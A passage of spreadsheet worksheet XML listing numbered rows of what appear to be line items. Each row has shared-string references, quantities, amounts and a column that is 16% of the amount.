      <c r="G236" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H236" s="10">
        <v>6</v>
      </c>
      <c r="I236" s="14">
        <v>47</v>
      </c>
      <c r="J236" s="15">
        <v>7.5168</v>
      </c>
      <c r="K236" s="16"/>
    </row>
    <row r="237" spans="2:11">
      <c r="B237" s="9">
        <v>233</v>
      </c>
      <c r="C237" s="238" t="s">
        <v>5227</v>
      </c>
      <c r="D237" s="9"/>
      <c r="E237" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F237" s="9"/>
      <c r="G237" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H237" s="10">
        <v>22</v>
      </c>
      <c r="I237" s="14">
        <v>6511.88</v>
      </c>
      <c r="J237" s="15">
        <v>1041.8848</v>
      </c>
      <c r="K237" s="16"/>
    </row>
    <row r="238" spans="2:11">
      <c r="B238" s="9">
        <v>234</v>
      </c>
      <c r="C238" s="238" t="s">
        <v>5228</v>
      </c>
      <c r="D238" s="9"/>
      <c r="E238" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F238" s="9"/>
      <c r="G238" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H238" s="10">
        <v>7</v>
      </c>
      <c r="I238" s="14">
        <v>1872.67</v>
      </c>
      <c r="J238" s="15">
        <v>299.6224</v>
      </c>
      <c r="K238" s="16"/>
    </row>
    <row r="239" spans="2:11">
      <c r="B239" s="9">
        <v>235</v>
      </c>
      <c r="C239" s="238" t="s">
        <v>5229</v>
      </c>
      <c r="D239" s="9"/>
      <c r="E239" s="238" t="s">
        <v>5214</v>
      </c>
      <c r="F239" s="238" t="s">
        <v>5230</v>
      </c>
      <c r="G239" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H239" s="10">
        <v>1</v>
      </c>
      <c r="I239" s="14">
        <v>4.28</v>
      </c>
      <c r="J239" s="15">
        <v>0.6848</v>
      </c>
      <c r="K239" s="16"/>
    </row>
    <row r="240" spans="2:11">
      <c r="B240" s="9">
        <v>236</v>
      </c>
      <c r="C240" s="238" t="s">
        <v>5231</v>
      </c>
      <c r="D240" s="9"/>
      <c r="E240" s="238" t="s">
        <v>5232</v>
      </c>
      <c r="F240" s="238" t="s">
        <v>4959</v>
      </c>
      <c r="G240" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H240" s="10">
        <v>30</v>
      </c>
      <c r="I240" s="14">
        <v>717.95</v>
      </c>
      <c r="J240" s="15">
        <v>114.864</v>
      </c>
      <c r="K240" s="16"/>
    </row>
    <row r="241" spans="2:11">
      <c r="B241" s="9">
        <v>237</v>
      </c>
      <c r="C241" s="238" t="s">
        <v>5233</v>
      </c>
      <c r="D241" s="238" t="s">
        <v>5234</v>
      </c>
      <c r="E241" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F241" s="238" t="s">
        <v>5235</v>
      </c>
      <c r="G241" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H241" s="10">
        <v>7</v>
      </c>
      <c r="I241" s="14">
        <v>509</v>
      </c>
      <c r="J241" s="15">
        <v>81.4352</v>
      </c>
      <c r="K241" s="16"/>
    </row>
    <row r="242" spans="2:11">
      <c r="B242" s="9">
        <v>238</v>
      </c>
      <c r="C242" s="238" t="s">
        <v>5236</v>
      </c>
      <c r="D242" s="238" t="s">
        <v>5237</v>
      </c>
      <c r="E242" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F242" s="238" t="s">
        <v>5235</v>
      </c>
      <c r="G242" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H242" s="10">
        <v>1</v>
      </c>
      <c r="I242" s="14">
        <v>163.88</v>
      </c>
      <c r="J242" s="15">
        <v>26.2208</v>
      </c>
      <c r="K242" s="16"/>
    </row>
    <row r="243" spans="2:11">
      <c r="B243" s="9">
        <v>239</v>
      </c>
      <c r="C243" s="238" t="s">
        <v>5238</v>
      </c>
      <c r="D243" s="238" t="s">
        <v>5239</v>
      </c>
      <c r="E243" s="238" t="s">
        <v>5240</v>
      </c>
      <c r="F243" s="238" t="s">
        <v>5235</v>
      </c>
      <c r="G243" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H243" s="10">
        <v>7</v>
      </c>
      <c r="I243" s="14">
        <v>54.95</v>
      </c>
      <c r="J243" s="15">
        <v>8.792</v>
      </c>
      <c r="K243" s="16"/>
    </row>
    <row r="244" spans="2:11">
      <c r="B244" s="9">
        <v>240</v>
      </c>
      <c r="C244" s="238" t="s">
        <v>5241</v>
      </c>
      <c r="D244" s="9"/>
      <c r="E244" s="238" t="s">
        <v>5242</v>
      </c>
      <c r="F244" s="238" t="s">
        <v>3403</v>
      </c>
      <c r="G244" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H244" s="10">
        <v>1</v>
      </c>
      <c r="I244" s="14">
        <v>1068.38</v>
      </c>
      <c r="J244" s="15">
        <v>170.9408</v>
      </c>
      <c r="K244" s="16"/>
    </row>
    <row r="245" spans="2:11">
      <c r="B245" s="9">
        <v>241</v>
      </c>
      <c r="C245" s="238" t="s">
        <v>5243</v>
      </c>
      <c r="D245" s="9"/>
      <c r="E245" s="238" t="s">
        <v>4981</v>
      </c>
      <c r="F245" s="238" t="s">
        <v>5244</v>
      </c>
      <c r="G245" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H245" s="10">
        <v>2</v>
      </c>
      <c r="I245" s="14">
        <v>200.57</v>
      </c>
      <c r="J245" s="15">
        <v>32.0928</v>
      </c>
      <c r="K245" s="16"/>
    </row>
    <row r="246" spans="2:11">
      <c r="B246" s="9">
        <v>242</v>
      </c>
      <c r="C246" s="238" t="s">
        <v>5245</v>
      </c>
      <c r="D246" s="238" t="s">
        <v>5246</v>
      </c>
      <c r="E246" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F246" s="238" t="s">
        <v>5244</v>
      </c>
      <c r="G246" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H246" s="10">
        <v>3</v>
      </c>
      <c r="I246" s="14">
        <v>462.07</v>
      </c>
      <c r="J246" s="15">
        <v>73.9296</v>
      </c>
      <c r="K246" s="16"/>
    </row>
    <row r="247" spans="2:11">
      <c r="B247" s="9">
        <v>243</v>
      </c>
      <c r="C247" s="238" t="s">
        <v>5247</v>
      </c>
      <c r="D247" s="238" t="s">
        <v>5248</v>
      </c>
      <c r="E247" s="238" t="s">
        <v>4837</v>
      </c>
      <c r="F247" s="238" t="s">
        <v>5244</v>
      </c>
      <c r="G247" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H247" s="10">
        <v>2</v>
      </c>
      <c r="I247" s="14">
        <v>1144.67</v>
      </c>
      <c r="J247" s="15">
        <v>183.1488</v>
      </c>
      <c r="K247" s="16"/>
    </row>
    <row r="248" spans="2:11">
      <c r="B248" s="9">
        <v>244</v>
      </c>
      <c r="C248" s="238" t="s">
        <v>5249</v>
      </c>
      <c r="D248" s="238" t="s">
        <v>5250</v>
      </c>
      <c r="E248" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F248" s="238" t="s">
        <v>5251</v>
      </c>
      <c r="G248" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H248" s="10">
        <v>3</v>
      </c>
      <c r="I248" s="14">
        <v>695.13</v>
      </c>
      <c r="J248" s="15">
        <v>111.2208</v>
      </c>
      <c r="K248" s="16"/>
    </row>
    <row r="249" spans="2:11">
      <c r="B249" s="9">
        <v>245</v>
      </c>
      <c r="C249" s="238" t="s">
        <v>5252</v>
      </c>
      <c r="D249" s="238" t="s">
        <v>5253</v>
      </c>
      <c r="E249" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F249" s="238" t="s">
        <v>5251</v>
      </c>
      <c r="G249" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H249" s="10">
        <v>2</v>
      </c>
      <c r="I249" s="14">
        <v>326.51</v>
      </c>
      <c r="J249" s="15">
        <v>52.2432</v>
      </c>
      <c r="K249" s="16"/>
    </row>
    <row r="250" spans="2:11">
      <c r="B250" s="9">
        <v>246</v>
      </c>
      <c r="C250" s="238" t="s">
        <v>5254</v>
      </c>
      <c r="D250" s="238" t="s">
        <v>5255</v>
      </c>
      <c r="E250" s="238" t="s">
        <v>5232</v>
      </c>
      <c r="F250" s="238" t="s">
        <v>5251</v>
      </c>
      <c r="G250" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H250" s="10">
        <v>40</v>
      </c>
      <c r="I250" s="14">
        <v>916.55</v>
      </c>
      <c r="J250" s="15">
        <v>146.624</v>
      </c>
      <c r="K250" s="16"/>
    </row>
    <row r="251" spans="2:11">
      <c r="B251" s="9">
        <v>247</v>
      </c>
      <c r="C251" s="238" t="s">
        <v>5256</v>
      </c>
      <c r="D251" s="9"/>
      <c r="E251" s="238" t="s">
        <v>4997</v>
      </c>
      <c r="F251" s="238" t="s">
        <v>5257</v>
      </c>
      <c r="G251" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H251" s="10">
        <v>1</v>
      </c>
      <c r="I251" s="14">
        <v>419.66</v>
      </c>
      <c r="J251" s="15">
        <v>67.1456</v>
      </c>
      <c r="K251" s="16"/>
    </row>
    <row r="252" spans="2:11">
      <c r="B252" s="9">
        <v>248</v>
      </c>
      <c r="C252" s="238" t="s">
        <v>5258</v>
      </c>
      <c r="D252" s="9"/>
      <c r="E252" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F252" s="238" t="s">
        <v>5257</v>
      </c>
      <c r="G252" s="237" t="s">
        <v>5137</v>
      </c>
      <c r="H252" s="10">
        <v>6</v>
      </c>
      <c r="I252" s="14">
        <v>738.45</v>
      </c>
      <c r="J252" s="15">
        <v>118.1568</v>
      </c>
      <c r="K252" s="16"/>
    </row>
    <row r="253" spans="2:11">
      <c r="B253" s="9">
        <v>249</v>
      </c>
      <c r="C253" s="238" t="s">
        <v>5259</v>
      </c>
      <c r="D253" s="9"/>
      <c r="E253" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F253" s="238" t="s">
        <v>5257</v>
      </c>
      <c r="G253" s="237" t="s">
        <v>5137</v>
      </c>
      <c r="H253" s="10">
        <v>6</v>
      </c>
      <c r="I253" s="14">
        <v>1139.3</v>
      </c>
      <c r="J253" s="15">
        <v>182.2848</v>
      </c>
      <c r="K253" s="16"/>
    </row>
    <row r="254" spans="2:11">
      <c r="B254" s="9">
        <v>250</v>
      </c>
      <c r="C254" s="238" t="s">
        <v>5260</v>
      </c>
      <c r="D254" s="9"/>
      <c r="E254" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F254" s="238" t="s">
        <v>5257</v>
      </c>
      <c r="G254" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H254" s="10">
        <v>5</v>
      </c>
      <c r="I254" s="14">
        <v>1260.65</v>
      </c>
      <c r="J254" s="15">
        <v>201.704</v>
      </c>
      <c r="K254" s="16"/>
    </row>
    <row r="255" spans="2:11">
      <c r="B255" s="9">
        <v>251</v>
      </c>
      <c r="C255" s="238" t="s">
        <v>5261</v>
      </c>
      <c r="D255" s="9"/>
      <c r="E255" s="238" t="s">
        <v>5222</v>
      </c>
      <c r="F255" s="238" t="s">
        <v>5257</v>
      </c>
      <c r="G255" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H255" s="10">
        <v>3</v>
      </c>
      <c r="I255" s="14">
        <v>192.31</v>
      </c>
      <c r="J255" s="15">
        <v>30.768</v>
      </c>
      <c r="K255" s="16"/>
    </row>
    <row r="256" spans="2:11">
      <c r="B256" s="9">
        <v>252</v>
      </c>
      <c r="C256" s="238" t="s">
        <v>5262</v>
      </c>
      <c r="D256" s="9"/>
      <c r="E256" s="238" t="s">
        <v>5217</v>
      </c>
      <c r="F256" s="238" t="s">
        <v>5257</v>
      </c>
      <c r="G256" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H256" s="10">
        <v>1</v>
      </c>
      <c r="I256" s="14">
        <v>1705.13</v>
      </c>
      <c r="J256" s="15">
        <v>272.8208</v>
      </c>
      <c r="K256" s="16"/>
    </row>
    <row r="257" spans="2:11">
      <c r="B257" s="9">
        <v>253</v>
      </c>
      <c r="C257" s="238" t="s">
        <v>5263</v>
      </c>
      <c r="D257" s="9"/>
      <c r="E257" s="238" t="s">
        <v>4837</v>
      </c>
      <c r="F257" s="238" t="s">
        <v>5257</v>
      </c>
      <c r="G257" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H257" s="10">
        <v>1</v>
      </c>
      <c r="I257" s="14">
        <v>94.01</v>
      </c>
      <c r="J257" s="15">
        <v>15.0416</v>
      </c>
      <c r="K257" s="16"/>
    </row>
    <row r="258" spans="2:11">
      <c r="B258" s="9">
        <v>254</v>
      </c>
      <c r="C258" s="238" t="s">
        <v>5264</v>
      </c>
      <c r="D258" s="9"/>
      <c r="E258" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F258" s="238" t="s">
        <v>5265</v>
      </c>
      <c r="G258" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H258" s="10">
        <v>2</v>
      </c>
      <c r="I258" s="14">
        <v>683.76</v>
      </c>
      <c r="J258" s="15">
        <v>109.4016</v>
      </c>
      <c r="K258" s="16"/>
    </row>
    <row r="259" spans="2:11">
      <c r="B259" s="9">
        <v>255</v>
      </c>
      <c r="C259" s="238" t="s">
        <v>5266</v>
      </c>
      <c r="D259" s="9"/>
      <c r="E259" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F259" s="238" t="s">
        <v>5267</v>
      </c>
      <c r="G259" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H259" s="10">
        <v>1</v>
      </c>
      <c r="I259" s="14">
        <v>3461.54</v>
      </c>
      <c r="J259" s="15">
        <v>553.8464</v>
      </c>
      <c r="K259" s="16"/>
    </row>
    <row r="260" spans="2:11">
      <c r="B260" s="9">
        <v>256</v>
      </c>
      <c r="C260" s="238" t="s">
        <v>5268</v>
      </c>
      <c r="D260" s="9"/>
      <c r="E260" s="238" t="s">
        <v>5269</v>
      </c>
      <c r="F260" s="238" t="s">
        <v>5267</v>
      </c>
      <c r="G260" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H260" s="10">
        <v>2</v>
      </c>
      <c r="I260" s="14">
        <v>34.19</v>
      </c>
      <c r="J260" s="15">
        <v>5.472</v>
      </c>
      <c r="K260" s="16"/>
    </row>
    <row r="261" spans="2:11">
      <c r="B261" s="9">
        <v>257</v>
      </c>
      <c r="C261" s="238" t="s">
        <v>5270</v>
      </c>
      <c r="D261" s="9"/>
      <c r="E261" s="238" t="s">
        <v>5149</v>
      </c>
      <c r="F261" s="238" t="s">
        <v>5267</v>
      </c>
      <c r="G261" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H261" s="10">
        <v>1</v>
      </c>
      <c r="I261" s="14">
        <v>1316.24</v>
      </c>
      <c r="J261" s="15">
        <v>210.5984</v>
      </c>
      <c r="K261" s="16"/>
    </row>
    <row r="262" spans="2:11">
      <c r="B262" s="9">
        <v>258</v>
      </c>
      <c r="C262" s="238" t="s">
        <v>5271</v>
      </c>
      <c r="D262" s="9"/>
      <c r="E262" s="238" t="s">
        <v>4837</v>
      </c>
      <c r="F262" s="238" t="s">
        <v>5267</v>
      </c>
      <c r="G262" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H262" s="10">
        <v>1</v>
      </c>
      <c r="I262" s="14">
        <v>1039.31</v>
      </c>
      <c r="J262" s="15">
        <v>166.2896</v>
      </c>
      <c r="K262" s="16"/>
    </row>
    <row r="263" spans="2:11">
      <c r="B263" s="9">
        <v>259</v>
      </c>
      <c r="C263" s="238" t="s">
        <v>5272</v>
      </c>
      <c r="D263" s="9"/>
      <c r="E263" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F263" s="238" t="s">
        <v>5273</v>
      </c>
      <c r="G263" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H263" s="10">
        <v>2</v>
      </c>
      <c r="I263" s="14">
        <v>1760.68</v>
      </c>
      <c r="J263" s="15">
        <v>281.7088</v>
      </c>
      <c r="K263" s="16"/>
    </row>
    <row r="264" spans="2:11">
      <c r="B264" s="9">
        <v>260</v>
      </c>
      <c r="C264" s="238" t="s">
        <v>5274</v>
      </c>
      <c r="D264" s="9"/>
      <c r="E264" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F264" s="238" t="s">
        <v>5273</v>
      </c>
      <c r="G264" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H264" s="10">
        <v>1</v>
      </c>
      <c r="I264" s="14">
        <v>2521.37</v>
      </c>
      <c r="J264" s="15">
        <v>403.4192</v>
      </c>
      <c r="K264" s="16"/>
    </row>
    <row r="265" spans="2:11">
      <c r="B265" s="9">
        <v>261</v>
      </c>
      <c r="C265" s="238" t="s">
        <v>5275</v>
      </c>
      <c r="D265" s="9"/>
      <c r="E265" s="238" t="s">
        <v>5222</v>
      </c>
      <c r="F265" s="238" t="s">
        <v>5063</v>
      </c>
      <c r="G265" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H265" s="10">
        <v>3</v>
      </c>
      <c r="I265" s="14">
        <v>740.51</v>
      </c>
      <c r="J265" s="15">
        <v>118.4832</v>
      </c>
      <c r="K265" s="16"/>
    </row>
    <row r="266" spans="2:11">
      <c r="B266" s="9">
        <v>262</v>
      </c>
      <c r="C266" s="238" t="s">
        <v>5276</v>
      </c>
      <c r="D266" s="9"/>
      <c r="E266" s="238" t="s">
        <v>5277</v>
      </c>
      <c r="F266" s="238" t="s">
        <v>5278</v>
      </c>
      <c r="G266" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H266" s="10">
        <v>1</v>
      </c>
      <c r="I266" s="14">
        <v>42.74</v>
      </c>
      <c r="J266" s="15">
        <v>6.8384</v>
      </c>
      <c r="K266" s="16"/>
    </row>
    <row r="267" spans="2:11">
      <c r="B267" s="9">
        <v>263</v>
      </c>
      <c r="C267" s="238" t="s">
        <v>5279</v>
      </c>
      <c r="D267" s="9"/>
      <c r="E267" s="238" t="s">
        <v>5232</v>
      </c>
      <c r="F267" s="238" t="s">
        <v>5278</v>
      </c>
      <c r="G267" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H267" s="10">
        <v>10</v>
      </c>
      <c r="I267" s="14">
        <v>230.74</v>
      </c>
      <c r="J267" s="15">
        <v>36.912</v>
      </c>
      <c r="K267" s="16"/>
    </row>
    <row r="268" spans="2:11">
      <c r="B268" s="9">
        <v>264</v>
      </c>
      <c r="C268" s="238" t="s">
        <v>5280</v>
      </c>
      <c r="D268" s="9"/>
      <c r="E268" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F268" s="238" t="s">
        <v>5278</v>
      </c>
      <c r="G268" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H268" s="10">
        <v>2</v>
      </c>
      <c r="I268" s="14">
        <v>246.15</v>
      </c>
      <c r="J268" s="15">
        <v>39.3856</v>
      </c>
      <c r="K268" s="16"/>
    </row>
    <row r="269" spans="2:11">
      <c r="B269" s="9">
        <v>265</v>
      </c>
      <c r="C269" s="238" t="s">
        <v>5281</v>
      </c>
      <c r="D269" s="9"/>
      <c r="E269" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F269" s="238" t="s">
        <v>5278</v>
      </c>
      <c r="G269" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H269" s="10">
        <v>1</v>
      </c>
      <c r="I269" s="14">
        <v>252.14</v>
      </c>
      <c r="J269" s="15">
        <v>40.3424</v>
      </c>
      <c r="K269" s="16"/>
    </row>
    <row r="270" spans="2:11">
      <c r="B270" s="9">
        <v>266</v>
      </c>
      <c r="C270" s="238" t="s">
        <v>5282</v>
      </c>
      <c r="D270" s="9"/>
      <c r="E270" s="238" t="s">
        <v>5214</v>
      </c>
      <c r="F270" s="238" t="s">
        <v>5278</v>
      </c>
      <c r="G270" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H270" s="10">
        <v>1</v>
      </c>
      <c r="I270" s="14">
        <v>35.9</v>
      </c>
      <c r="J270" s="15">
        <v>5.744</v>
      </c>
      <c r="K270" s="16"/>
    </row>
    <row r="271" spans="2:11">
      <c r="B271" s="9">
        <v>267</v>
      </c>
      <c r="C271" s="238" t="s">
        <v>5283</v>
      </c>
      <c r="D271" s="9"/>
      <c r="E271" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F271" s="238" t="s">
        <v>5278</v>
      </c>
      <c r="G271" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H271" s="10">
        <v>1</v>
      </c>
      <c r="I271" s="14">
        <v>337.61</v>
      </c>
      <c r="J271" s="15">
        <v>54.0176</v>
      </c>
      <c r="K271" s="16"/>
    </row>
    <row r="272" spans="2:11">
      <c r="B272" s="9">
        <v>268</v>
      </c>
      <c r="C272" s="238" t="s">
        <v>5284</v>
      </c>
      <c r="D272" s="238" t="s">
        <v>5285</v>
      </c>
      <c r="E272" s="238" t="s">
        <v>5286</v>
      </c>
      <c r="F272" s="238" t="s">
        <v>5287</v>
      </c>
      <c r="G272" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H272" s="10">
        <v>1</v>
      </c>
      <c r="I272" s="14">
        <v>12.1</v>
      </c>
      <c r="J272" s="15">
        <v>1.936</v>
      </c>
      <c r="K272" s="16"/>
    </row>
    <row r="273" spans="2:11">
      <c r="B273" s="9">
        <v>269</v>
      </c>
      <c r="C273" s="238" t="s">
        <v>5288</v>
      </c>
      <c r="D273" s="238" t="s">
        <v>5289</v>
      </c>
      <c r="E273" s="238" t="s">
        <v>5290</v>
      </c>
      <c r="F273" s="9"/>
      <c r="G273" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H273" s="10">
        <v>1</v>
      </c>
      <c r="I273" s="14">
        <v>269.59</v>
      </c>
      <c r="J273" s="15">
        <v>43.1344</v>
      </c>
      <c r="K273" s="16"/>
    </row>
    <row r="274" spans="2:11">
      <c r="B274" s="9">
        <v>270</v>
      </c>
      <c r="C274" s="238" t="s">
        <v>5291</v>
      </c>
      <c r="D274" s="238" t="s">
        <v>5292</v>
      </c>
      <c r="E274" s="238" t="s">
        <v>5293</v>
      </c>
      <c r="F274" s="9"/>
      <c r="G274" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H274" s="10">
        <v>6</v>
      </c>
      <c r="I274" s="14">
        <v>537.74</v>
      </c>
      <c r="J274" s="15">
        <v>86.0352</v>
      </c>
      <c r="K274" s="16"/>
    </row>
    <row r="275" spans="2:11">
      <c r="B275" s="9">
        <v>271</v>
      </c>
      <c r="C275" s="238" t="s">
        <v>5294</v>
      </c>
      <c r="D275" s="9"/>
      <c r="E275" s="238" t="s">
        <v>5295</v>
      </c>
      <c r="F275" s="238" t="s">
        <v>5296</v>
      </c>
      <c r="G275" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H275" s="10">
        <v>4</v>
      </c>
      <c r="I275" s="14">
        <v>1830.17</v>
      </c>
      <c r="J275" s="15">
        <v>292.8256</v>
      </c>
      <c r="K275" s="16"/>
    </row>
    <row r="276" spans="2:11">
      <c r="B276" s="9">
        <v>272</v>
      </c>
      <c r="C276" s="238" t="s">
        <v>5297</v>
      </c>
      <c r="D276" s="9"/>
      <c r="E276" s="238" t="s">
        <v>5295</v>
      </c>
      <c r="F276" s="238" t="s">
        <v>5298</v>
      </c>
      <c r="G276" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H276" s="10">
        <v>4</v>
      </c>
      <c r="I276" s="14">
        <v>1450.48</v>
      </c>
      <c r="J276" s="15">
        <v>232.0768</v>
      </c>
      <c r="K276" s="16"/>
    </row>
    <row r="277" spans="2:11">
      <c r="B277" s="9">
        <v>273</v>
      </c>
      <c r="C277" s="238" t="s">
        <v>5299</v>
      </c>
      <c r="D277" s="9"/>
      <c r="E277" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F277" s="238" t="s">
        <v>5300</v>
      </c>
      <c r="G277" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H277" s="10">
        <v>1</v>
      </c>
      <c r="I277" s="14">
        <v>1153.85</v>
      </c>
      <c r="J277" s="15">
        <v>184.616</v>
      </c>
      <c r="K277" s="16"/>
    </row>
    <row r="278" spans="2:11">
      <c r="B278" s="9">
        <v>274</v>
      </c>
      <c r="C278" s="238" t="s">
        <v>5301</v>
      </c>
      <c r="D278" s="9"/>
      <c r="E278" s="238" t="s">
        <v>5302</v>
      </c>
      <c r="F278" s="238" t="s">
        <v>5300</v>
      </c>
      <c r="G278" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H278" s="10">
        <v>1</v>
      </c>
      <c r="I278" s="14">
        <v>512.82</v>
      </c>
      <c r="J278" s="15">
        <v>82.0512</v>
      </c>
      <c r="K278" s="16"/>
    </row>
    <row r="279" spans="2:11">
      <c r="B279" s="9">
        <v>275</v>
      </c>
      <c r="C279" s="238" t="s">
        <v>5303</v>
      </c>
      <c r="D279" s="9"/>
      <c r="E279" s="238" t="s">
        <v>5304</v>
      </c>
      <c r="F279" s="238" t="s">
        <v>5305</v>
      </c>
      <c r="G279" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H279" s="10">
        <v>43</v>
      </c>
      <c r="I279" s="14">
        <v>139.53</v>
      </c>
      <c r="J279" s="15">
        <v>22.2912</v>
      </c>
      <c r="K279" s="16"/>
    </row>
    <row r="280" spans="2:11">
      <c r="B280" s="9">
        <v>276</v>
      </c>
      <c r="C280" s="238" t="s">
        <v>5306</v>
      </c>
      <c r="D280" s="238" t="s">
        <v>5307</v>
      </c>
      <c r="E280" s="238" t="s">
        <v>5290</v>
      </c>
      <c r="F280" s="238" t="s">
        <v>5308</v>
      </c>
      <c r="G280" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H280" s="10">
        <v>1</v>
      </c>
      <c r="I280" s="14">
        <v>159.04</v>
      </c>
      <c r="J280" s="15">
        <v>25.4464</v>
      </c>
      <c r="K280" s="16"/>
    </row>
    <row r="281" spans="2:11">
      <c r="B281" s="9">
        <v>278</v>
      </c>
      <c r="C281" s="238" t="s">
        <v>5309</v>
      </c>
      <c r="D281" s="238" t="s">
        <v>5310</v>
      </c>
      <c r="E281" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F281" s="238" t="s">
        <v>5305</v>
      </c>
      <c r="G281" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H281" s="10">
        <v>13</v>
      </c>
      <c r="I281" s="14">
        <v>36.31</v>
      </c>
      <c r="J281" s="15">
        <v>5.8032</v>
      </c>
      <c r="K281" s="16"/>
    </row>
    <row r="282" spans="2:11">
      <c r="B282" s="9">
        <v>279</v>
      </c>
      <c r="C282" s="238" t="s">
        <v>5312</v>
      </c>
      <c r="D282" s="238" t="s">
        <v>5313</v>
      </c>
      <c r="E282" s="238" t="s">
        <v>5314</v>
      </c>
      <c r="F282" s="238" t="s">
        <v>5315</v>
      </c>
      <c r="G282" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H282" s="10">
        <v>8</v>
      </c>
      <c r="I282" s="14">
        <v>170.94</v>
      </c>
      <c r="J282" s="15">
        <v>27.3536</v>
      </c>
      <c r="K282" s="16"/>
    </row>
    <row r="283" spans="2:11">
      <c r="B283" s="9">
        <v>280</v>
      </c>
      <c r="C283" s="238" t="s">
        <v>5316</v>
      </c>
      <c r="D283" s="238" t="s">
        <v>5317</v>
      </c>
      <c r="E283" s="238" t="s">
        <v>5318</v>
      </c>
      <c r="F283" s="238" t="s">
        <v>5305</v>
      </c>
      <c r="G283" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H283" s="10">
        <v>90</v>
      </c>
      <c r="I283" s="14">
        <v>89.25</v>
      </c>
      <c r="J283" s="15">
        <v>14.256</v>
      </c>
      <c r="K283" s="16"/>
    </row>
    <row r="284" spans="2:11">
      <c r="B284" s="9">
        <v>281</v>
      </c>
      <c r="C284" s="238" t="s">
        <v>5319</v>
      </c>
      <c r="D284" s="238" t="s">
        <v>5320</v>
      </c>
      <c r="E284" s="238" t="s">
        <v>5321</v>
      </c>
      <c r="F284" s="238" t="s">
        <v>5322</v>
      </c>
      <c r="G284" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H284" s="10">
        <v>1</v>
      </c>
      <c r="I284" s="14">
        <v>1269.04</v>
      </c>
      <c r="J284" s="15">
        <v>203.0464</v>
      </c>
      <c r="K284" s="16"/>
    </row>
    <row r="285" spans="2:11">
      <c r="B285" s="9">
        <v>282</v>
      </c>
      <c r="C285" s="238" t="s">
        <v>5323</v>
      </c>
      <c r="D285" s="238" t="s">
        <v>5324</v>
      </c>
      <c r="E285" s="238" t="s">
        <v>4738</v>
      </c>
      <c r="F285" s="238" t="s">
        <v>5322</v>
      </c>
      <c r="G285" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H285" s="10">
        <v>1</v>
      </c>
      <c r="I285" s="14">
        <v>56</v>
      </c>
      <c r="J285" s="15">
        <v>8.96</v>
      </c>
      <c r="K285" s="16"/>
    </row>
    <row r="286" spans="2:11">
      <c r="B286" s="9">
        <v>283</v>
      </c>
      <c r="C286" s="238" t="s">
        <v>5325</v>
      </c>
      <c r="D286" s="238" t="s">
        <v>5326</v>
      </c>
      <c r="E286" s="238" t="s">
        <v>5327</v>
      </c>
      <c r="F286" s="238" t="s">
        <v>5322</v>
      </c>
      <c r="G286" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H286" s="10">
        <v>1</v>
      </c>
      <c r="I286" s="14">
        <v>612.82</v>
      </c>
      <c r="J286" s="15">
        <v>98.0512</v>
      </c>
      <c r="K286" s="16"/>
    </row>
    <row r="287" spans="2:11">
      <c r="B287" s="9">
        <v>284</v>
      </c>
      <c r="C287" s="238" t="s">
        <v>5328</v>
      </c>
      <c r="D287" s="238" t="s">
        <v>5329</v>
